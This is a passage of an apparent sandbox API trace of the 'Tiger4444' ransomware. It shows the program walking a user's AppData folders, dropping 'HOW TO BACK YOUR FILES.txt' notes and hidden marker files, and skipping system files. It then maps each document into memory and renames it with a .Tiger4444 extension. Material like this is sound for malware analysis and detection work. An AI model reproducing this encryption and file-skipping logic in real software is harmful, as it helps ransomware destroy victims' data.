dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0055.158] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0055.158] lstrcpyW (in: lpString1=0x30aeb14, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.158] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\credentials\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0055.159] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0055.159] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0055.159] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.159] CloseHandle (hObject=0x2b8) returned 1 [0055.159] CloseHandle (hObject=0x2c4) returned 1 [0055.159] GetCurrentThreadId () returned 0xfa8 [0055.159] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0055.159] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography" [0055.161] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0055.161] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0055.161] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography" [0055.161] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\" [0055.161] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\.BFC0E91B00AE8A0620D3" [0055.162] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0055.163] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0055.166] FlushFileBuffers (hFile=0x2c4) returned 1 [0055.167] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.170] CloseHandle (hObject=0x2c4) returned 1 [0055.172] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography") returned 54 [0055.172] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.172] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d0f124, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d35364, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x85e6b338, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0055.172] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.172] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.172] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0055.172] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.172] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d0f124, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d35364, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x85e6b338, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.172] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.172] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.172] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0055.172] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.172] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.172] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x85e6b338, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x85e6b338, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x85e6b338, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.172] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.172] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.173] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d35364, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d35364, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2e40435, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 1 [0055.173] lstrcmpiW (lpString1="Style", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.173] lstrcmpiW (lpString1="Style", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.173] lstrcmpiW (lpString1="Style", lpString2="Tiger4444.exe") returned -1 [0055.173] lstrcmpiW (lpString1="Style", lpString2=".") returned 1 [0055.173] lstrcmpiW (lpString1="Style", lpString2="..") returned 1 [0055.173] lstrcmpiW (lpString1="Style", lpString2="windows") returned -1 [0055.173] lstrcmpiW (lpString1="Style", lpString2="bootmgr") returned 1 [0055.173] lstrcmpiW (lpString1="Style", lpString2="pagefile.sys") returned 1 [0055.173] lstrcmpiW (lpString1="Style", lpString2="boot") returned 1 [0055.173] lstrcmpiW (lpString1="Style", lpString2="ids.txt") returned 1 [0055.173] lstrcmpiW (lpString1="Style", lpString2="NTUSER.DAT") returned 1 [0055.173] lstrcpyW (in: lpString1=0x30aeb16, lpString2="Style" | out: lpString1="Style") returned="Style" [0055.173] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc666c0 [0055.173] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x7a) returned 0xc72258 [0055.173] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc666c8 | out: ListHead=0xc66828, ListEntry=0xc666c8) returned 0xc663a8 [0055.173] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d35364, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d35364, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2e40435, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 0 [0055.173] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0055.173] lstrcpyW (in: lpString1=0x30aeb16, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0055.173] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0055.179] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0055.179] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0055.179] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.179] CloseHandle (hObject=0x2b8) returned 1 [0055.180] CloseHandle (hObject=0x2c4) returned 1 [0055.180] GetCurrentThreadId () returned 0xfa8 [0055.180] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666c8 [0055.180] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0055.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0055.180] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666c0 | out: hHeap=0xc50000) returned 1 [0055.180] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0055.180] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\" [0055.180] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\.BFC0E91B00AE8A0620D3" [0055.180] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0055.186] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0055.189] FlushFileBuffers (hFile=0x2c4) returned 1 [0055.190] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0055.190] CloseHandle (hObject=0x2c4) returned 1 [0055.190] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned 60 [0055.191] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0055.191] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d35364, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e40435, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x85e9235a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73108 [0055.191] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.191] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.191] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0055.191] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0055.191] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d35364, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e40435, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x85e9235a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.191] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.191] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0055.191] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0055.191] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0055.191] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0055.191] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x85e9235a, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x85e9235a, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x85e9235a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0055.191] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.192] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0055.192] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d35364, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d35364, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x1f7c60e, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x51722, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="APASixthEditionOfficeOnline.xsl", cAlternateFileName="APASIX~1.XSL")) returned 1 [0055.192] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.192] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.192] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="Tiger4444.exe") returned -1 [0055.192] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2=".") returned 1 [0055.192] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="..") returned 1 [0055.192] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="windows") returned -1 [0055.192] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="bootmgr") returned -1 [0055.192] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="pagefile.sys") returned -1 [0055.192] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="boot") returned -1 [0055.192] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="ids.txt") returned -1 [0055.192] lstrcmpiW (lpString1="APASixthEditionOfficeOnline.xsl", lpString2="NTUSER.DAT") returned -1 [0055.192] lstrcpyW (in: lpString1=0x30aeb22, lpString2="APASixthEditionOfficeOnline.xsl" | out: lpString1="APASixthEditionOfficeOnline.xsl") returned="APASixthEditionOfficeOnline.xsl" [0055.192] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl", dwFileAttributes=0x0) returned 1 [0055.192] lstrlenW (lpString="APASixthEditionOfficeOnline.xsl") returned 31 [0055.192] lstrlenW (lpString="Tiger4444") returned 9 [0055.192] lstrcmpiW (lpString1="nline.xsl", lpString2="Tiger4444") returned -1 [0055.192] lstrlenW (lpString=".dll") returned 4 [0055.192] lstrcmpiW (lpString1=".xsl", lpString2=".dll") returned 1 [0055.192] lstrlenW (lpString=".lnk") returned 4 [0055.193] lstrcmpiW (lpString1=".xsl", lpString2=".lnk") returned 1 [0055.193] lstrlenW (lpString=".ini") returned 4 [0055.193] lstrcmpiW (lpString1=".xsl", lpString2=".ini") returned 1 [0055.193] lstrlenW (lpString=".sys") returned 4 [0055.193] lstrcmpiW (lpString1=".xsl", lpString2=".sys") returned 1 [0055.193] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0055.193] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0055.193] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14664617368) returned 1 [0055.193] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=333602) returned 1 [0055.193] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0055.193] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0055.193] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x51a30, lpName=0x0) returned 0x2cc [0055.194] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x51a30) returned 0xbe0000 [0055.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0055.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0055.213] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0055.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0055.213] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0055.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0055.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0055.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0055.214] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14666680572) returned 1 [0055.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0055.214] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0055.214] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.217] CloseHandle (hObject=0x2cc) returned 1 [0055.217] CloseHandle (hObject=0x2b8) returned 1 [0055.217] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl.Tiger4444") returned 102 [0055.217] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\APASixthEditionOfficeOnline.xsl.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\apasixtheditionofficeonline.xsl.tiger4444"), dwFlags=0x1) returned 1 [0055.217] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d5b719, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d5b719, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2120015, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x48839, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CHICAGO.XSL", cAlternateFileName="")) returned 1 [0055.217] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.217] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.217] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="Tiger4444.exe") returned -1 [0055.217] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2=".") returned 1 [0055.218] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="..") returned 1 [0055.218] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="windows") returned -1 [0055.218] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="bootmgr") returned 1 [0055.218] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="pagefile.sys") returned -1 [0055.218] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="boot") returned 1 [0055.218] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="ids.txt") returned -1 [0055.218] lstrcmpiW (lpString1="CHICAGO.XSL", lpString2="NTUSER.DAT") returned -1 [0055.218] lstrcpyW (in: lpString1=0x30aeb22, lpString2="CHICAGO.XSL" | out: lpString1="CHICAGO.XSL") returned="CHICAGO.XSL" [0055.218] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL", dwFileAttributes=0x0) returned 1 [0055.218] lstrlenW (lpString="CHICAGO.XSL") returned 11 [0055.218] lstrlenW (lpString="Tiger4444") returned 9 [0055.218] lstrcmpiW (lpString1="ICAGO.XSL", lpString2="Tiger4444") returned -1 [0055.218] lstrlenW (lpString=".dll") returned 4 [0055.218] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0055.218] lstrlenW (lpString=".lnk") returned 4 [0055.218] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0055.218] lstrlenW (lpString=".ini") returned 4 [0055.218] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0055.218] lstrlenW (lpString=".sys") returned 4 [0055.218] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0055.218] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0055.218] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0055.218] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14667153601) returned 1 [0055.218] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=297017) returned 1 [0055.219] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0055.219] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72258 [0055.219] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x48b40, lpName=0x0) returned 0x2cc [0055.220] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x48b40) returned 0xbe0000 [0055.236] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0055.236] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0055.236] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0055.236] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0055.236] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0055.236] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) 